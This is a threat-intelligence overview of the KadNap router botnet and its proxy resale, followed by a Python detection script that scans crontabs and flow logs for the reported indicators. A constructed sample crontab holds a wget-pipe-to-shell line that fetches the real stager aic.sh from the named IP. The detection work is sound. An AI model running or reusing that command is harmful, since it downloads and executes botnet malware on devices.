Overview
- Active since August 2025, the operation now averages roughly 14,000 infected edge devices, with about 60% located in the United States.
- The intrusion chain pulls the aic.sh script from 212.104.141.140, sets a cron job that fires every 55 minutes, and installs a ‘kad’ ELF client built for ARM and MIPS routers.
- KadNap uses a custom Kademlia DHT for peer discovery, yet despite that decentralized design infected nodes consistently relay through two intermediary peers before reaching the command servers, exposing those relay peers as a potential disruption point.
- Access to the hijacked routers is sold through the Doppelganger residential-proxy service, assessed as a rebrand of Faceless linked to TheMoon, enabling DDoS, credential stuffing, and brute-force activity.
- Lumen’s Black Lotus Labs blocked traffic to the botnet’s control infrastructure on its own network and plans to release indicators of compromise to support wider defensive efforts.
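The host and network indicators in the overview (the aic.sh download from 212.104.141.140, a 55-minute cron job, and a ‘kad’ ELF client) are enough for a first-pass hunt on router exports or flow logs. The script below is an added example, not code from Lumen or Black Lotus Labs; the crontab and flow-log samples are constructed, the key=value flow format is assumed, and the `*/55` form of the cron schedule is an assumption rather than something the report states.

```python
"""Triage crontab dumps and flow logs for the KadNap indicators named in the
overview. Added example; sample data below is constructed, not captured."""
import re
from dataclasses import dataclass

# Indicators taken from the overview.
STAGER_HOST = "212.104.141.140"
STAGER_NAME = "aic.sh"
CRON_INTERVAL_MIN = 55

# Assumption: the 55-minute job is written as a */55 minute field. A 5-field
# cron line cannot express a true 55-minute period (*/55 fires at :00 and :55),
# so this is a heuristic; the host/script/binary names are the stronger signals.
CRON_STEP_RE = re.compile(r"\*/(\d+)")
# 'kad' as a whole path component or argv[0]; must not match e.g. 'kadmin'.
KAD_RE = re.compile(r"(?:^|[\s/])kad(?:\s|$)")
# Assumed flow-log format: whitespace-separated key=value pairs per line.
KV_RE = re.compile(r"(\w+)=(\S+)")


@dataclass
class Finding:
    source: str
    line_no: int
    reasons: list
    text: str


def scan_crontab(lines, source="crontab"):
    """Flag crontab entries that match the report's indicators."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        # Skip blanks, comments and VAR=value assignments (SHELL=, PATH=, ...).
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        # For /etc/crontab the user field lands in 'command'; harmless for matching.
        schedule, command = fields[:5], " ".join(fields[5:])
        reasons = []
        step = CRON_STEP_RE.fullmatch(schedule[0])
        if step and int(step.group(1)) == CRON_INTERVAL_MIN \
                and all(f == "*" for f in schedule[1:]):
            reasons.append(f"{CRON_INTERVAL_MIN}-minute schedule")
        if STAGER_HOST in command:
            reasons.append("stager host")
        if STAGER_NAME in command:
            reasons.append("stager script")
        if KAD_RE.search(command):
            reasons.append("kad client")
        if reasons:
            findings.append(Finding(source, n, reasons, line))
    return findings


def scan_flow_log(lines, source="flow"):
    """Flag flows to the stager host or HTTP requests for the stager script."""
    findings = []
    for n, raw in enumerate(lines, 1):
        kv = dict(KV_RE.findall(raw))
        reasons = []
        if kv.get("dst") == STAGER_HOST:
            reasons.append("connection to stager host")
        if kv.get("url", "").endswith("/" + STAGER_NAME):
            reasons.append("stager script requested")
        if reasons:
            findings.append(Finding(source, n, reasons, raw.strip()))
    return findings


# Constructed sample inputs (not real captures). Non-indicator addresses are
# from the RFC 5737 documentation ranges.
SAMPLE_CRONTAB = """\
# constructed sample crontab
SHELL=/bin/sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/55 * * * * /tmp/kad
*/5 * * * * wget -q http://212.104.141.140/aic.sh -O - | sh
"""

SAMPLE_FLOWS = """\
ts=2025-09-01T10:00:00Z src=10.0.0.7 dst=203.0.113.5 dport=443 proto=tcp
ts=2025-09-01T10:00:05Z src=10.0.0.7 dst=212.104.141.140 dport=80 proto=tcp url=http://212.104.141.140/aic.sh
ts=2025-09-01T10:01:00Z src=10.0.0.7 dst=198.51.100.1 dport=53 proto=udp
"""


def triage(crontab_text=SAMPLE_CRONTAB, flow_text=SAMPLE_FLOWS):
    """Run both scanners and return every finding for review."""
    return scan_crontab(crontab_text.splitlines()) + scan_flow_log(flow_text.splitlines())


if __name__ == "__main__":
    for f in triage():
        print(f"{f.source}:{f.line_no} {', '.join(f.reasons)}: {f.text}")
```

Treat a hit on the stager host or script name as high confidence and a bare `*/55` schedule as a lead to confirm by inspecting the binary it runs; the single IP here is the only network indicator the overview gives, so the hunt should be widened once the promised indicator release is available.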